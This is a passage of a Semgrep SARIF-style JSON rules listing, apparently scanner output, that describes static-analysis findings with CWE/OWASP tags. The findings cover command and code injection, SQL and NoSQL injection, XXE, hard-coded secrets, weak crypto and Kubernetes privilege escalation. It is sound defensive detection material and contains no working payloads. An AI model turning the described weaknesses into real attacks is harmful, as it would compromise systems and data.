[https://blog.elcomsoft.com/2020/08/extracting-and-decrypting-ios-keychain-physical-logical-and-cloud-options-explored/](https://blog.elcomsoft.com/2020/08/extracting-and-decrypting-ios-keychain-physical-logical-and-cloud-options-explored/)\n","text":"The application was observed to store keychain items with the accessibility type `kSecAttrAccessibleAlways` meaning that the data is not sufficiently protected at rest. Ideally, the application should use `kSecAttrAccessibleWhenUnlocked` to configure the data to be accessible only when the user has unlocked the screen."},"helpUri":"https://semgrep.dev/r/swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","id":"swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","name":"swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always","properties":{"precision":"very-high","tags":["CWE-272: Least Privilege Violation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.biometrics-and-auth.keychain-always-accessible.keychain-accessible-always"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url)\n - [https://docs.rs/tokio-postgres/latest/tokio_postgres/](https://docs.rs/tokio-postgres/latest/tokio_postgres/)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","id":"rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","name":"rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: rust.secrets.tokio-postgres.hardcoded-connection-url.hardcoded-connection-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"ERC721 onERC721Received() reentrancy"},"help":{"markdown":"ERC721 onERC721Received() reentrancy\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.erc721-reentrancy.erc721-reentrancy)\n - [https://blocksecteam.medium.com/when-safemint-becomes-unsafe-lessons-from-the-hypebears-security-incident-2965209bda2a](https://blocksecteam.medium.com/when-safemint-becomes-unsafe-lessons-from-the-hypebears-security-incident-2965209bda2a)\n - [https://etherscan.io/address/0x14e0a1f310e2b7e321c91f58847e98b8c802f6ef](https://etherscan.io/address/0x14e0a1f310e2b7e321c91f58847e98b8c802f6ef)\n","text":"ERC721 onERC721Received() reentrancy"},"helpUri":"https://semgrep.dev/r/solidity.security.erc721-reentrancy.erc721-reentrancy","id":"solidity.security.erc721-reentrancy.erc721-reentrancy","name":"solidity.security.erc721-reentrancy.erc721-reentrancy","properties":{"precision":"very-high","tags":["CWE-841: Improper Enforcement of Behavioral Workflow","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.erc721-reentrancy.erc721-reentrancy"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar."},"help":{"markdown":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host)\n - [https://nginx.org/en/docs/http/ngx_http_map_module.html](https://nginx.org/en/docs/http/ngx_http_map_module.html)\n","text":"The host for this proxy URL is dynamically determined. This can be dangerous if the host can be injected by an attacker because it may forcibly alter destination of the proxy. Consider hardcoding acceptable destinations and retrieving them with 'map' or something similar."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","id":"generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","name":"generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host","properties":{"precision":"very-high","tags":["CWE-441: Unintended Proxy or Intermediary ('Confused Deputy')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.dynamic-proxy-host.dynamic-proxy-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\"."},"help":{"markdown":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\".\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://blog.sonarsource.com/secure-xml-processor](https://blog.sonarsource.com/secure-xml-processor)\n - [https://xerces.apache.org/xerces2-j/features.html](https://xerces.apache.org/xerces2-j/features.html)\n","text":"DOCTYPE declarations are enabled for this TransformerFactory. This is vulnerable to XML external entity attacks. Disable this by setting the attributes \"accessExternalDTD\" and \"accessExternalStylesheet\" to \"\"."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","id":"java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","name":"java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","HIGH CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xxe.transformerfactory-dtds-not-disabled.transformerfactory-dtds-not-disabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","id":"python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","name":"python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.neo4j.python-neo4j-hardcoded-secret.python-neo4j-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","id":"csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","name":"csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.system.passwordauthenticationmethod-hardcoded-secret.passwordauthenticationmethod-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"help":{"markdown":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.use-of-md5.use-of-md5)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"Detected MD5 hash algorithm which is considered insecure. MD5 is not collision resistant and is therefore not suitable as a cryptographic signature. Use SHA256 or SHA3 instead."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.use-of-md5.use-of-md5","id":"kotlin.lang.security.use-of-md5.use-of-md5","name":"kotlin.lang.security.use-of-md5.use-of-md5","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.use-of-md5.use-of-md5"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"help":{"markdown":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/kotlin.lang.security.no-null-cipher.no-null-cipher)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"NullCipher was detected. This will not encrypt anything; the cipher text will be the same as the plain text. Use a valid, secure cipher: Cipher.getInstance(\"AES/CBC/PKCS7PADDING\"). See https://owasp.org/www-community/Using_the_Java_Cryptographic_Extensions for more information."},"helpUri":"https://semgrep.dev/r/kotlin.lang.security.no-null-cipher.no-null-cipher","id":"kotlin.lang.security.no-null-cipher.no-null-cipher","name":"kotlin.lang.security.no-null-cipher.no-null-cipher","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: kotlin.lang.security.no-null-cipher.no-null-cipher"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","id":"swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","name":"swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: swift.cryptoswift.chacha20-hardcoded-secret.chacha20-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option."},"help":{"markdown":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked)\n - [https://owasp.org/Top10/A04_2021-Insecure_Design](https://owasp.org/Top10/A04_2021-Insecure_Design)\n","text":"No token revoking configured for `express-jwt`. A leaked token could still be used and unable to be revoked. Consider using function as the `isRevoked` option."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","id":"javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","name":"javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked","properties":{"precision":"very-high","tags":["CWE-522: Insufficiently Protected Credentials","MEDIUM CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-jwt-not-revoked.express-jwt-not-revoked"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client."},"help":{"markdown":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected DynamoDB query params that are tainted by `$EVENT` object. This could lead to NoSQL injection if the variable is user-controlled and not properly sanitized. Explicitly assign query params instead of passing data from `$EVENT` directly to DynamoDB client."},"helpUri":"https://semgrep.dev/r/javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","id":"javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","name":"javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.aws-lambda.security.dynamodb-request-object.dynamodb-request-object"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input)\n - [https://docs.oracle.com/javase/8/docs/api/java/lang/Runtime.html](https://docs.oracle.com/javase/8/docs/api/java/lang/Runtime.html)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands. For more information, see: [Java command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"helpUri":"https://semgrep.dev/r/java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","id":"java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","name":"java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.simple-command-injection-direct-input.simple-command-injection-direct-input"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking."},"help":{"markdown":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.rails.security.brakeman.check-regex-dos.check-regex-dos)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n","text":"Found a potentially user-controllable argument in the construction of a regular expressions. This may result in excessive resource consumption when applied to certain inputs, or when the user is allowed to control the match target. Avoid allowing users to specify regular expressions processed by the server. If you must support user-controllable input in a regular expression, use an allow-list to restrict the expressions users may supply to limit catastrophic backtracking."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","id":"ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","name":"ruby.rails.security.brakeman.check-regex-dos.check-regex-dos","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.brakeman.check-regex-dos.check-regex-dos"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.code.vm-express.vm-express)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing code containing user input. If this is unavoidable, validate and sanitize the input, and use safe alternatives for evaluating user input."},"helpUri":"https://semgrep.dev/r/javascript.express.code.vm-express.vm-express","id":"javascript.express.code.vm-express.vm-express","name":"javascript.express.code.vm-express.vm-express","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.code.vm-express.vm-express"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead."},"help":{"markdown":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv)\n - [https://nodejs.org/api/crypto.html#cryptocreatecipheralgorithm-password-options](https://nodejs.org/api/crypto.html#cryptocreatecipheralgorithm-password-options)\n - [https://nodejs.org/api/crypto.html#cryptocreatedecipheralgorithm-password-options](https://nodejs.org/api/crypto.html#cryptocreatedecipheralgorithm-password-options)\n","text":"The deprecated functions 'createCipher' and 'createDecipher' generate the same initialization vector every time. For counter modes such as CTR, GCM, or CCM this leads to break of both confidentiality and integrity, if the key is used more than once. Other modes are still affected in their strength, though they're not completely broken. Use 'createCipheriv' or 'createDecipheriv' instead."},"helpUri":"https://semgrep.dev/r/javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","id":"javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","name":"javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv","properties":{"precision":"very-high","tags":["CWE-1204: Generation of Weak Initialization Vector (IV)","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.node-crypto.security.create-de-cipher-no-iv.create-de-cipher-no-iv"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks."},"help":{"markdown":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privilege-escalation](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#privilege-escalation)\n - [https://kubernetes.io/docs/tasks/configure-pod-container/security-context/](https://kubernetes.io/docs/tasks/configure-pod-container/security-context/)\n - [https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt](https://www.kernel.org/doc/Documentation/prctl/no_new_privs.txt)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag](https://cheatsheetseries.owasp.org/cheatsheets/Docker_Security_Cheat_Sheet.html#rule-4-add-no-new-privileges-flag)\n","text":"In Kubernetes, each pod runs in its own isolated environment with its own set of security policies. However, certain container images may contain `setuid` or `setgid` binaries that could allow an attacker to perform privilege escalation and gain access to sensitive resources. To mitigate this risk, it's recommended to add a `securityContext` to the container in the pod, with the parameter `allowPrivilegeEscalation` set to `false`. This will prevent the container from running any privileged processes and limit the impact of any potential attacks. In the container `$CONTAINER` this parameter is set to `true` which makes this container much more vulnerable to privelege escalation attacks."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","id":"yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","name":"yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.allow-privilege-escalation-true.allow-privilege-escalation-true"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter."},"help":{"markdown":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.avoid-mktemp.avoid-mktemp)\n - [https://docs.python.org/3/library/tempfile.html#tempfile.mktemp](https://docs.python.org/3/library/tempfile.html#tempfile.mktemp)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"The function `mktemp` is deprecated. When using this function, it is possible for an attacker to modify the created file before the filename is returned. Use `NamedTemporaryFile()` instead and pass it the `delete=False` parameter."},"helpUri":"https://semgrep.dev/r/python.lang.file.avoid-mktemp.avoid-mktemp","id":"python.lang.file.avoid-mktemp.avoid-mktemp","name":"python.lang.file.avoid-mktemp.avoid-mktemp","properties":{"precision":"very-high","tags":["CWE-377: Insecure Temporary File","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.avoid-mktemp.avoid-mktemp"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements)."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. When building SQL queries in Go, it is possible to adopt prepared statements by using the `Prepare` and `PrepareContext` calls with parameterized queries. For more information, see: [Prepared statements in Go](https://go.dev/doc/database/prepared-statements).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.net.sql.pg-sqli-taint.pg-sqli-taint)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://pg.uptrace.dev/queries/](https://pg.uptrace.dev/queries/)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL 